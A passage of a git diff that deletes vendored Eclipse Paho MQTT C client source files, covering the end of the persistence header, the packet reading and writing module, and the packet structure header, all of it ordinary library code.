-  * @param nkeys A pointer to the number of keys in this persistent data store. 
-  * This function sets the number of keys, if successful.
-  * @return Return 0 if the function completes successfully, otherwise return
-  * ::MQTTCLIENT_PERSISTENCE_ERROR.
-  */
-typedef int (*Persistence_keys)(void* handle, char*** keys, int* nkeys);
-
-/**
-  * @brief Clears the persistence store, so that it no longer contains any 
-  * persisted data.
-  *
-  * @param handle The handle pointer from a successful call to 
-  * Persistence_open().
-  * @return Return 0 if the function completes successfully, otherwise return
-  * ::MQTTCLIENT_PERSISTENCE_ERROR.
-  */
-typedef int (*Persistence_clear)(void* handle);
-
-/**
-  * @brief Returns whether any data has been persisted using the specified key.
-  *
-  * @param handle The handle pointer from a successful call to 
-  * Persistence_open().
-  * @param key The string to be tested for existence in the store.
-  * @return Return 0 if the key was found in the store, otherwise return
-  * ::MQTTCLIENT_PERSISTENCE_ERROR.
-  */
-typedef int (*Persistence_containskey)(void* handle, char* key);
-
-/**
-  * @brief A structure containing the function pointers to a persistence 
-  * implementation and the context or state that will be shared across all 
-  * the persistence functions.
-  */
-typedef struct {
-  /** 
-    * A pointer to any data required to initialize the persistent store.
-    */
-	void* context;
-  /** 
-    * A function pointer to an implementation of Persistence_open().
-    */
-	Persistence_open popen;
-  /** 
-    * A function pointer to an implementation of Persistence_close().
-    */
-	Persistence_close pclose;
-  /**
-    * A function pointer to an implementation of Persistence_put().
-    */
-	Persistence_put pput;
-  /** 
-    * A function pointer to an implementation of Persistence_get().
-    */
-	Persistence_get pget;
-  /** 
-    * A function pointer to an implementation of Persistence_remove().
-    */
-	Persistence_remove premove;
-  /** 
-    * A function pointer to an implementation of Persistence_keys().
-    */
-	Persistence_keys pkeys;
-  /** 
-    * A function pointer to an implementation of Persistence_clear().
-    */
-	Persistence_clear pclear;
-  /** 
-    * A function pointer to an implementation of Persistence_containskey().
-    */
-	Persistence_containskey pcontainskey;
-} MQTTClient_persistence;
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/MQTTPacket.c b/thirdparty/paho.mqtt.c/src/MQTTPacket.c
deleted file mode 100644
index c21a432..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTPacket.c
+++ /dev/null
@@ -1,755 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2014 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - MQTT 3.1.1 support
- *******************************************************************************/
-
-/**
- * @file
- * \brief functions to deal with reading and writing of MQTT packets from and to sockets
- *
- * Some other related functions are in the MQTTPacketOut module
- */
-
-#include "MQTTPacket.h"
-#include "Log.h"
-#if !defined(NO_PERSISTENCE)
-	#include "MQTTPersistence.h"
-#endif
-#include "Messages.h"
-#include "StackTrace.h"
-
-#include <stdlib.h>
-#include <string.h>
-
-#include "Heap.h"
-
-#if !defined(min)
-#define min(A,B) ( (A) < (B) ? (A):(B))
-#endif
-
-/**
- * List of the predefined MQTT v3 packet names.
- */
-static const char *packet_names[] =
-{
-	"RESERVED", "CONNECT", "CONNACK", "PUBLISH", "PUBACK", "PUBREC", "PUBREL",
-	"PUBCOMP", "SUBSCRIBE", "SUBACK", "UNSUBSCRIBE", "UNSUBACK",
-	"PINGREQ", "PINGRESP", "DISCONNECT"
-};
-
-const char** MQTTClient_packet_names = packet_names;
-
-
-/**
- * Converts an MQTT packet code into its name
- * @param ptype packet code
- * @return the corresponding string, or "UNKNOWN"
- */
-const char* MQTTPacket_name(int ptype)
-{
-	return (ptype >= 0 && ptype <= DISCONNECT) ? packet_names[ptype] : "UNKNOWN";
-}
-
-/**
- * Array of functions to build packets, indexed according to packet code
- */
-pf new_packets[] =
-{
-	NULL,	/**< reserved */
-	NULL,	/**< MQTTPacket_connect*/
-	MQTTPacket_connack, /**< CONNACK */
-	MQTTPacket_publish,	/**< PUBLISH */
-	MQTTPacket_ack, /**< PUBACK */
-	MQTTPacket_ack, /**< PUBREC */
-	MQTTPacket_ack, /**< PUBREL */
-	MQTTPacket_ack, /**< PUBCOMP */
-	NULL, /**< MQTTPacket_subscribe*/
-	MQTTPacket_suback, /**< SUBACK */
-	NULL, /**< MQTTPacket_unsubscribe*/
-	MQTTPacket_ack, /**< UNSUBACK */
-	MQTTPacket_header_only, /**< PINGREQ */
-	MQTTPacket_header_only, /**< PINGRESP */
-	MQTTPacket_header_only  /**< DISCONNECT */
-};
-
-
-static char* readUTFlen(char** pptr, char* enddata, int* len);
-static int MQTTPacket_send_ack(int type, int msgid, int dup, networkHandles *net);
-
-/**
- * Reads one MQTT packet from a socket.
- * @param socket a socket from which to read an MQTT packet
- * @param error pointer to the error code which is completed if no packet is returned
- * @return the packet structure or NULL if there was an error
- */
-void* MQTTPacket_Factory(networkHandles* net, int* error)
-{
-	char* data = NULL;
-	static Header header;
-	size_t remaining_length;
-	int ptype;
-	void* pack = NULL;
-	size_t actual_len = 0;
-
-	FUNC_ENTRY;
-	*error = SOCKET_ERROR;  /* indicate whether an error occurred, or not */
-
-	/* read the packet data from the socket */
-#if defined(OPENSSL)
-	*error = (net->ssl) ? SSLSocket_getch(net->ssl, net->socket, &header.byte) : Socket_getch(net->socket, &header.byte); 
-#else
-	*error = Socket_getch(net->socket, &header.byte);
-#endif
-	if (*error != TCPSOCKET_COMPLETE)   /* first byte is the header byte */
-		goto exit; /* packet not read, *error indicates whether SOCKET_ERROR occurred */
-
-	/* now read the remaining length, so we know how much more to read */
-	if ((*error = MQTTPacket_decode(net, &remaining_length)) != TCPSOCKET_COMPLETE)
-		goto exit; /* packet not read, *error indicates whether SOCKET_ERROR occurred */
-
-	/* now read the rest, the variable header and payload */
-#if defined(OPENSSL)
-	data = (net->ssl) ? SSLSocket_getdata(net->ssl, net->socket, remaining_length, &actual_len) : 
-						Socket_getdata(net->socket, remaining_length, &actual_len);
-#else
-	data = Socket_getdata(net->socket, remaining_length, &actual_len);
-#endif
-	if (data == NULL)
-	{
-		*error = SOCKET_ERROR;
-		goto exit; /* socket error */
-	}
-
-	if (actual_len != remaining_length)
-		*error = TCPSOCKET_INTERRUPTED;
-	else
-	{
-		ptype = header.bits.type;
-		if (ptype < CONNECT || ptype > DISCONNECT || new_packets[ptype] == NULL)
-			Log(TRACE_MIN, 2, NULL, ptype);
-		else
-		{
-			if ((pack = (*new_packets[ptype])(header.byte, data, remaining_length)) == NULL)
-				*error = BAD_MQTT_PACKET;
-#if !defined(NO_PERSISTENCE)
-			else if (header.bits.type == PUBLISH && header.bits.qos == 2)
-			{
-				int buf0len;
-				char *buf = malloc(10);
-				buf[0] = header.byte;
-				buf0len = 1 + MQTTPacket_encode(&buf[1], remaining_length);
-				*error = MQTTPersistence_put(net->socket, buf, buf0len, 1,
-					&data, &remaining_length, header.bits.type, ((Publish *)pack)->msgId, 1);
-				free(buf);
-			}
-#endif
-		}
-	}
-	if (pack)
-		time(&(net->lastReceived));
-exit:
-	FUNC_EXIT_RC(*error);
-	return pack;
-}
-
-
-/**
- * Sends an MQTT packet in one system call write
- * @param socket the socket to which to write the data
- * @param header the one-byte MQTT header
- * @param buffer the rest of the buffer to write (not including remaining length)
- * @param buflen the length of the data in buffer to be written
- * @return the completion code (TCPSOCKET_COMPLETE etc)
- */
-int MQTTPacket_send(networkHandles* net, Header header, char* buffer, size_t buflen, int freeData)
-{
-	int rc;
-	size_t buf0len;
-	char *buf;
-
-	FUNC_ENTRY;
-	buf = malloc(10);
-	buf[0] = header.byte;
-	buf0len = 1 + MQTTPacket_encode(&buf[1], buflen);
-#if !defined(NO_PERSISTENCE)
-	if (header.bits.type == PUBREL)
-	{
-		char* ptraux = buffer;
-		int msgId = readInt(&ptraux);
-		rc = MQTTPersistence_put(net->socket, buf, buf0len, 1, &buffer, &buflen,
-			header.bits.type, msgId, 0);
-	}
-#endif
-
-#if defined(OPENSSL)
-	if (net->ssl)
-		rc = SSLSocket_putdatas(net->ssl, net->socket, buf, buf0len, 1, &buffer, &buflen, &freeData);
-	else
-#endif
-		rc = Socket_putdatas(net->socket, buf, buf0len, 1, &buffer, &buflen, &freeData);
-		
-	if (rc == TCPSOCKET_COMPLETE)
-		time(&(net->lastSent));
-	
-	if (rc != TCPSOCKET_INTERRUPTED)
-	  free(buf);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Sends an MQTT packet from multiple buffers in one system call write
- * @param socket the socket to which to write the data
- * @param header the one-byte MQTT header
- * @param count the number of buffers
- * @param buffers the rest of the buffers to write (not including remaining length)
- * @param buflens the lengths of the data in the array of buffers to be written
- * @return the completion code (TCPSOCKET_COMPLETE etc)
- */
-int MQTTPacket_sends(networkHandles* net, Header header, int count, char** buffers, size_t* buflens, int* frees)
-{
-	int i, rc;
-	size_t buf0len, total = 0;
-	char *buf;
-
-	FUNC_ENTRY;
-	buf = malloc(10);
-	buf[0] = header.byte;
-	for (i = 0; i < count; i++)
-		total += buflens[i];
-	buf0len = 1 + MQTTPacket_encode(&buf[1], total);
-#if !defined(NO_PERSISTENCE)
-	if (header.bits.type == PUBLISH && header.bits.qos != 0)
-	{   /* persist PUBLISH QoS1 and Qo2 */
-		char *ptraux = buffers[2];
-		int msgId = readInt(&ptraux);
-		rc = MQTTPersistence_put(net->socket, buf, buf0len, count, buffers, buflens,
-			header.bits.type, msgId, 0);
-	}
-#endif
-#if defined(OPENSSL)
-	if (net->ssl)
-		rc = SSLSocket_putdatas(net->ssl, net->socket, buf, buf0len, count, buffers, buflens, frees);
-	else
-#endif
-		rc = Socket_putdatas(net->socket, buf, buf0len, count, buffers, buflens, frees);
-		
-	if (rc == TCPSOCKET_COMPLETE)
-		time(&(net->lastSent));
-	
-	if (rc != TCPSOCKET_INTERRUPTED)
-	  free(buf);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Encodes the message length according to the MQTT algorithm
- * @param buf the buffer into which the encoded data is written
- * @param length the length to be encoded
- * @return the number of bytes written to buffer
- */
-int MQTTPacket_encode(char* buf, size_t length)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	do
-	{
-		char d = length % 128;
-		length /= 128;
-		/* if there are more digits to encode, set the top bit of this digit */
-		if (length > 0)
-			d |= 0x80;
-		buf[rc++] = d;
-	} while (length > 0);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Decodes the message length according to the MQTT algorithm
- * @param socket the socket from which to read the bytes
- * @param value the decoded length returned
- * @return the number of bytes read from the socket
- */
-int MQTTPacket_decode(networkHandles* net, size_t* value)
-{
-	int rc = SOCKET_ERROR;
-	char c;
-	int multiplier = 1;
-	int len = 0;
-#define MAX_NO_OF_REMAINING_LENGTH_BYTES 4
-
-	FUNC_ENTRY;
-	*value = 0;
-	do
-	{
-		if (++len > MAX_NO_OF_REMAINING_LENGTH_BYTES)
-		{
-			rc = SOCKET_ERROR;	/* bad data */
-			goto exit;
-		}
-#if defined(OPENSSL)
-		rc = (net->ssl) ? SSLSocket_getch(net->ssl, net->socket, &c) : Socket_getch(net->socket, &c);
-#else
-		rc = Socket_getch(net->socket, &c);
-#endif
-		if (rc != TCPSOCKET_COMPLETE)
-				goto exit;
-		*value += (c & 127) * multiplier;
-		multiplier *= 128;
-	} while ((c & 128) != 0);
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Calculates an integer from two bytes read from the input buffer
- * @param pptr pointer to the input buffer - incremented by the number of bytes used & returned
- * @return the integer value calculated
- */
-int readInt(char** pptr)
-{
-	char* ptr = *pptr;
-	int len = 256*((unsigned char)(*ptr)) + (unsigned char)(*(ptr+1));
-	*pptr += 2;
-	return len;
-}
-
-
-/**
- * Reads a "UTF" string from the input buffer.  UTF as in the MQTT v3 spec which really means
- * a length delimited string.  So it reads the two byte length then the data according to
- * that length.  The end of the buffer is provided too, so we can prevent buffer overruns caused
- * by an incorrect length.
- * @param pptr pointer to the input buffer - incremented by the number of bytes used & returned
- * @param enddata pointer to the end of the buffer not to be read beyond
- * @param len returns the calculcated value of the length bytes read
- * @return an allocated C string holding the characters read, or NULL if the length read would
- * have caused an overrun.
- *
- */
-static char* readUTFlen(char** pptr, char* enddata, int* len)
-{
-	char* string = NULL;
-
-	FUNC_ENTRY;
-	if (enddata - (*pptr) > 1) /* enough length to read the integer? */
-	{
-		*len = readInt(pptr);
-		if (&(*pptr)[*len] <= enddata)
-		{
-			string = malloc(*len+1);
-			memcpy(string, *pptr, *len);
-			string[*len] = '\0';
-			*pptr += *len;
-		}
-	}
-	FUNC_EXIT;
-	return string;
-}
-
-
-/**
- * Reads a "UTF" string from the input buffer.  UTF as in the MQTT v3 spec which really means
- * a length delimited string.  So it reads the two byte length then the data according to
- * that length.  The end of the buffer is provided too, so we can prevent buffer overruns caused
- * by an incorrect length.
- * @param pptr pointer to the input buffer - incremented by the number of bytes used & returned
- * @param enddata pointer to the end of the buffer not to be read beyond
- * @return an allocated C string holding the characters read, or NULL if the length read would
- * have caused an overrun.
- */
-char* readUTF(char** pptr, char* enddata)
-{
-	int len;
-	return readUTFlen(pptr, enddata, &len);
-}
-
-
-/**
- * Reads one character from the input buffer.
- * @param pptr pointer to the input buffer - incremented by the number of bytes used & returned
- * @return the character read
- */
-unsigned char readChar(char** pptr)
-{
-	unsigned char c = **pptr;
-	(*pptr)++;
-	return c;
-}
-
-
-/**
- * Writes one character to an output buffer.
- * @param pptr pointer to the output buffer - incremented by the number of bytes used & returned
- * @param c the character to write
- */
-void writeChar(char** pptr, char c)
-{
-	**pptr = c;
-	(*pptr)++;
-}
-
-
-/**
- * Writes an integer as 2 bytes to an output buffer.
- * @param pptr pointer to the output buffer - incremented by the number of bytes used & returned
- * @param anInt the integer to write
- */
-void writeInt(char** pptr, int anInt)
-{
-	**pptr = (char)(anInt / 256);
-	(*pptr)++;
-	**pptr = (char)(anInt % 256);
-	(*pptr)++;
-}
-
-
-/**
- * Writes a "UTF" string to an output buffer.  Converts C string to length-delimited.
- * @param pptr pointer to the output buffer - incremented by the number of bytes used & returned
- * @param string the C string to write
- */
-void writeUTF(char** pptr, const char* string)
-{
-	size_t len = strlen(string);
-	writeInt(pptr, (int)len);
-	memcpy(*pptr, string, len);
-	*pptr += len;
-}
-
-
-/**
- * Writes length delimited data to an output buffer
- * @param pptr pointer to the output buffer - incremented by the number of bytes used & returned
- * @param data the data to write
- * @param datalen the length of the data to write
- */
-void writeData(char** pptr, const void* data, int datalen)
-{
-	writeInt(pptr, datalen);
-	memcpy(*pptr, data, datalen);
-	*pptr += datalen;
-}
-
-
-/**
- * Function used in the new packets table to create packets which have only a header.
- * @param aHeader the MQTT header byte
- * @param data the rest of the packet
- * @param datalen the length of the rest of the packet
- * @return pointer to the packet structure
- */
-void* MQTTPacket_header_only(unsigned char aHeader, char* data, size_t datalen)
-{
-	static unsigned char header = 0;
-	header = aHeader;
-	return &header;
-}
-
-
-/**
- * Send an MQTT disconnect packet down a socket.
- * @param socket the open socket to send the data to
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_disconnect(networkHandles *net, const char* clientID)
-{
-	Header header;
-	int rc = 0;
-
-	FUNC_ENTRY;
-	header.byte = 0;
-	header.bits.type = DISCONNECT;
-	rc = MQTTPacket_send(net, header, NULL, 0, 0);
-	Log(LOG_PROTOCOL, 28, NULL, net->socket, clientID, rc);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Function used in the new packets table to create publish packets.
- * @param aHeader the MQTT header byte
- * @param data the rest of the packet
- * @param datalen the length of the rest of the packet
- * @return pointer to the packet structure
- */
-void* MQTTPacket_publish(unsigned char aHeader, char* data, size_t datalen)
-{
-	Publish* pack = malloc(sizeof(Publish));
-	char* curdata = data;
-	char* enddata = &data[datalen];
-
-	FUNC_ENTRY;
-	pack->header.byte = aHeader;
-	if ((pack->topic = readUTFlen(&curdata, enddata, &pack->topiclen)) == NULL) /* Topic name on which to publish */
-	{
-		free(pack);
-		pack = NULL;
-		goto exit;
-	}
-	if (pack->header.bits.qos > 0)  /* Msgid only exists for QoS 1 or 2 */
-		pack->msgId = readInt(&curdata);
-	else
-		pack->msgId = 0;
-	pack->payload = curdata;
-	pack->payloadlen = (int)(datalen-(curdata-data));
-exit:
-	FUNC_EXIT;
-	return pack;
-}
-
-
-/**
- * Free allocated storage for a publish packet.
- * @param pack pointer to the publish packet structure
- */
-void MQTTPacket_freePublish(Publish* pack)
-{
-	FUNC_ENTRY;
-	if (pack->topic != NULL)
-		free(pack->topic);
-	free(pack);
-	FUNC_EXIT;
-}
-
-
-/**
- * Send an MQTT acknowledgement packet down a socket.
- * @param type the MQTT packet type e.g. SUBACK
- * @param msgid the MQTT message id to use
- * @param dup boolean - whether to set the MQTT DUP flag
- * @param net the network handle to send the data to
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-static int MQTTPacket_send_ack(int type, int msgid, int dup, networkHandles *net)
-{
-	Header header;
-	int rc;
-	char *buf = malloc(2);
-	char *ptr = buf;
-
-	FUNC_ENTRY;
-	header.byte = 0;
-	header.bits.type = type;
-	header.bits.dup = dup;
-	if (type == PUBREL)
-	    header.bits.qos = 1;
-	writeInt(&ptr, msgid);
-	if ((rc = MQTTPacket_send(net, header, buf, 2, 1)) != TCPSOCKET_INTERRUPTED)
-		free(buf);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Send an MQTT PUBACK packet down a socket.
- * @param msgid the MQTT message id to use
- * @param socket the open socket to send the data to
- * @param clientID the string client identifier, only used for tracing
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_puback(int msgid, networkHandles* net, const char* clientID)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	rc =  MQTTPacket_send_ack(PUBACK, msgid, 0, net);
-	Log(LOG_PROTOCOL, 12, NULL, net->socket, clientID, msgid, rc);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Free allocated storage for a suback packet.
- * @param pack pointer to the suback packet structure
- */
-void MQTTPacket_freeSuback(Suback* pack)
-{
-	FUNC_ENTRY;
-	if (pack->qoss != NULL)
-		ListFree(pack->qoss);
-	free(pack);
-	FUNC_EXIT;
-}
-
-
-/**
- * Send an MQTT PUBREC packet down a socket.
- * @param msgid the MQTT message id to use
- * @param socket the open socket to send the data to
- * @param clientID the string client identifier, only used for tracing
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_pubrec(int msgid, networkHandles* net, const char* clientID)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	rc =  MQTTPacket_send_ack(PUBREC, msgid, 0, net);
-	Log(LOG_PROTOCOL, 13, NULL, net->socket, clientID, msgid, rc);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Send an MQTT PUBREL packet down a socket.
- * @param msgid the MQTT message id to use
- * @param dup boolean - whether to set the MQTT DUP flag
- * @param socket the open socket to send the data to
- * @param clientID the string client identifier, only used for tracing
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_pubrel(int msgid, int dup, networkHandles* net, const char* clientID)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	rc = MQTTPacket_send_ack(PUBREL, msgid, dup, net);
-	Log(LOG_PROTOCOL, 16, NULL, net->socket, clientID, msgid, rc);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Send an MQTT PUBCOMP packet down a socket.
- * @param msgid the MQTT message id to use
- * @param socket the open socket to send the data to
- * @param clientID the string client identifier, only used for tracing
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_pubcomp(int msgid, networkHandles* net, const char* clientID)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	rc = MQTTPacket_send_ack(PUBCOMP, msgid, 0, net);
-	Log(LOG_PROTOCOL, 18, NULL, net->socket, clientID, msgid, rc);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Function used in the new packets table to create acknowledgement packets.
- * @param aHeader the MQTT header byte
- * @param data the rest of the packet
- * @param datalen the length of the rest of the packet
- * @return pointer to the packet structure
- */
-void* MQTTPacket_ack(unsigned char aHeader, char* data, size_t datalen)
-{
-	Ack* pack = malloc(sizeof(Ack));
-	char* curdata = data;
-
-	FUNC_ENTRY;
-	pack->header.byte = aHeader;
-	pack->msgId = readInt(&curdata);
-	FUNC_EXIT;
-	return pack;
-}
-
-
-/**
- * Send an MQTT PUBLISH packet down a socket.
- * @param pack a structure from which to get some values to use, e.g topic, payload
- * @param dup boolean - whether to set the MQTT DUP flag
- * @param qos the value to use for the MQTT QoS setting
- * @param retained boolean - whether to set the MQTT retained flag
- * @param socket the open socket to send the data to
- * @param clientID the string client identifier, only used for tracing
- * @return the completion code (e.g. TCPSOCKET_COMPLETE)
- */
-int MQTTPacket_send_publish(Publish* pack, int dup, int qos, int retained, networkHandles* net, const char* clientID)
-{
-	Header header;
-	char *topiclen;
-	int rc = -1;
-
-	FUNC_ENTRY;
-	topiclen = malloc(2);
-
-	header.bits.type = PUBLISH;
-	header.bits.dup = dup;
-	header.bits.qos = qos;
-	header.bits.retain = retained;
-	if (qos > 0)
-	{
-		char *buf = malloc(2);
-		char *ptr = buf;
-		char* bufs[4] = {topiclen, pack->topic, buf, pack->payload};
-		size_t lens[4] = {2, strlen(pack->topic), 2, pack->payloadlen};
-		int frees[4] = {1, 0, 1, 0};
-
-		writeInt(&ptr, pack->msgId);
-		ptr = topiclen;
-		writeInt(&ptr, (int)lens[1]);
-		rc = MQTTPacket_sends(net, header, 4, bufs, lens, frees);
-		if (rc != TCPSOCKET_INTERRUPTED)
-			free(buf);
-	}
-	else
-	{
-		char* ptr = topiclen;
-		char* bufs[3] = {topiclen, pack->topic, pack->payload};
-		size_t lens[3] = {2, strlen(pack->topic), pack->payloadlen};
-		int frees[3] = {1, 0, 0};
-
-		writeInt(&ptr, (int)lens[1]);
-		rc = MQTTPacket_sends(net, header, 3, bufs, lens, frees);
-	}
-	if (rc != TCPSOCKET_INTERRUPTED)
-		free(topiclen);
-	if (qos == 0)
-		Log(LOG_PROTOCOL, 27, NULL, net->socket, clientID, retained, rc);
-	else
-		Log(LOG_PROTOCOL, 10, NULL, net->socket, clientID, pack->msgId, qos, retained, rc,
-				min(20, pack->payloadlen), pack->payload);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Free allocated storage for a various packet tyoes
- * @param pack pointer to the suback packet structure
- */
-void MQTTPacket_free_packet(MQTTPacket* pack)
-{
-	FUNC_ENTRY;
-	if (pack->header.bits.type == PUBLISH)
-		MQTTPacket_freePublish((Publish*)pack);
-	/*else if (pack->header.type == SUBSCRIBE)
-		MQTTPacket_freeSubscribe((Subscribe*)pack, 1);
-	else if (pack->header.type == UNSUBSCRIBE)
-		MQTTPacket_freeUnsubscribe((Unsubscribe*)pack);*/
-	else
-		free(pack);
-	FUNC_EXIT;
-}
diff --git a/thirdparty/paho.mqtt.c/src/MQTTPacket.h b/thirdparty/paho.mqtt.c/src/MQTTPacket.h
deleted file mode 100644
index 8bad955..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTPacket.h
+++ /dev/null
@@ -1,262 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - MQTT 3.1.1 support
- *    Ian Craggs - big endian Linux reversed definition
- *******************************************************************************/
-
-#if !defined(MQTTPACKET_H)
-#define MQTTPACKET_H
-
-#include "Socket.h"
-#if defined(OPENSSL)
-#include "SSLSocket.h"
-#endif
-#include "LinkedList.h"
-#include "Clients.h"
-
-/*BE
-include "Socket"
-include "LinkedList"
-include "Clients"
-BE*/
-
-typedef unsigned int bool;
-typedef void* (*pf)(unsigned char, char*, size_t);
-
-#define BAD_MQTT_PACKET -4
-
-enum msgTypes
-{
-	CONNECT = 1, CONNACK, PUBLISH, PUBACK, PUBREC, PUBREL,
-	PUBCOMP, SUBSCRIBE, SUBACK, UNSUBSCRIBE, UNSUBACK,
-	PINGREQ, PINGRESP, DISCONNECT
-};
-
-#if defined(__linux__)
-#include <endian.h>
-#if __BYTE_ORDER == __BIG_ENDIAN
-	#define REVERSED 1
-#endif
-#endif
-
-/**
- * Bitfields for the MQTT header byte.
- */
-typedef union
-{
-	/*unsigned*/ char byte;	/**< the whole byte */
-#if defined(REVERSED)
-	struct
-	{
-		unsigned int type : 4;	/**< message type nibble */
-		bool dup : 1;			/**< DUP flag bit */
-		unsigned int qos : 2;	/**< QoS value, 0, 1 or 2 */
-		bool retain : 1;		/**< retained flag bit */
-	} bits;
-#else
-	struct
-	{
-		bool retain : 1;		/**< retained flag bit */
-		unsigned int qos : 2;	/**< QoS value, 0, 1 or 2 */
-		bool dup : 1;			/**< DUP flag bit */
-		unsigned int type : 4;	/**< message type nibble */
-	} bits;
-#endif
-} Header;
-
-
-/**
- * Data for a connect packet.
- */
-typedef struct
-{
-	Header header;	/**< MQTT header byte */
-	union
-	{
-		unsigned char all;	/**< all connect flags */
-#if defined(REVERSED)
-		struct
-		{
-			bool username : 1;			/**< 3.1 user name */
-			bool password : 1; 			/**< 3.1 password */
-			bool willRetain : 1;		/**< will retain setting */
-			unsigned int willQoS : 2;	/**< will QoS value */
-			bool will : 1;			/**< will flag */
-			bool cleanstart : 1;	/**< cleansession flag */
-			int : 1;	/**< unused */
-		} bits;
-#else
-		struct
-		{
-			int : 1;	/**< unused */
-			bool cleanstart : 1;	/**< cleansession flag */
-			bool will : 1;			/**< will flag */
-			unsigned int willQoS : 2;	/**< will QoS value */
-			bool willRetain : 1;		/**< will retain setting */
-			bool password : 1; 			/**< 3.1 password */
-			bool username : 1;			/**< 3.1 user name */
-		} bits;
-#endif
-	} flags;	/**< connect flags byte */
-
-	char *Protocol, /**< MQTT protocol name */
-		*clientID,	/**< string client id */
-        *willTopic,	/**< will topic */
-        *willMsg;	/**< will payload */
-
-	int keepAliveTimer;		/**< keepalive timeout value in seconds */
-	unsigned char version;	/**< MQTT version number */
-} Connect;
-
-
-/**
- * Data for a connack packet.
- */
-typedef struct
-{
-	Header header; /**< MQTT header byte */
-	union
-	{
-		unsigned char all;	/**< all connack flags */
-#if defined(REVERSED)
-		struct
-		{
-			unsigned int reserved : 7;	/**< message type nibble */
-			bool sessionPresent : 1;    /**< was a session found on the server? */
-		} bits;
-#else
-		struct
-		{
-			bool sessionPresent : 1;    /**< was a session found on the server? */
-			unsigned int reserved : 7;	/**< message type nibble */
-		} bits;
-#endif
-	} flags;	 /**< connack flags byte */
-	char rc; /**< connack return code */
-} Connack;
-
-
-/**
- * Data for a packet with header only.
- */
-typedef struct
-{
-	Header header;	/**< MQTT header byte */
-} MQTTPacket;
-
-
-/**
- * Data for a subscribe packet.
- */
-typedef struct
-{
-	Header header;	/**< MQTT header byte */
-	int msgId;		/**< MQTT message id */
-	List* topics;	/**< list of topic strings */
-	List* qoss;		/**< list of corresponding QoSs */
-	int noTopics;	/**< topic and qos count */
-} Subscribe;
-
-
-/**
- * Data for a suback packet.
- */
-typedef struct
-{
-	Header header;	/**< MQTT header byte */
-	int msgId;		/**< MQTT message id */
-	List* qoss;		/**< list of granted QoSs */
-} Suback;
-
-
-/**
- * Data for an unsubscribe packet.
- */
-typedef struct
-{
-	Header header;	/**< MQTT header byte */
-	int msgId;		/**< MQTT message id */
-	List* topics;	/**< list of topic strings */
-	int noTopics;	/**< topic count */
-} Unsubscribe;
-
-
-/**
- * Data for a publish packet.
- */
-typedef struct
-{
-	Header header;	/**< MQTT header byte */
-	char* topic;	/**< topic string */
-	int topiclen;
-	int msgId;		/**< MQTT message id */
-	char* payload;	/**< binary payload, length delimited */
-	int payloadlen;	/**< payload length */
-} Publish;
-
-
-/**
- * Data for one of the ack packets.
- */
-typedef struct
-{
-	Header header;	/**< MQTT header byte */
-	int msgId;		/**< MQTT message id */
-} Ack;
-
-typedef Ack Puback;
-typedef Ack Pubrec;
-typedef Ack Pubrel;
-typedef Ack Pubcomp;
-typedef Ack Unsuback;
-
-int MQTTPacket_encode(char* buf, size_t length);
-int MQTTPacket_decode(networkHandles* net, size_t* value);
-int readInt(char** pptr);
-char* readUTF(char** pptr, char* enddata);
-unsigned char readChar(char** pptr);
-void writeChar(char** pptr, char c);
-void writeInt(char** pptr, int anInt);
-void writeUTF(char** pptr, const char* string);
-void writeData(char** pptr, const void* data, int datalen);
-
-const char* MQTTPacket_name(int ptype);
-
-void* MQTTPacket_Factory(networkHandles* net, int* error);
-int MQTTPacket_send(networkHandles* net, Header header, char* buffer, size_t buflen, int free);
-int MQTTPacket_sends(networkHandles* net, Header header, int count, char** buffers, size_t* buflens, int* frees);
-
-void* MQTTPacket_header_only(unsigned char aHeader, char* data, size_t datalen);
-int MQTTPacket_send_disconnect(networkHandles* net, const char* clientID);
-
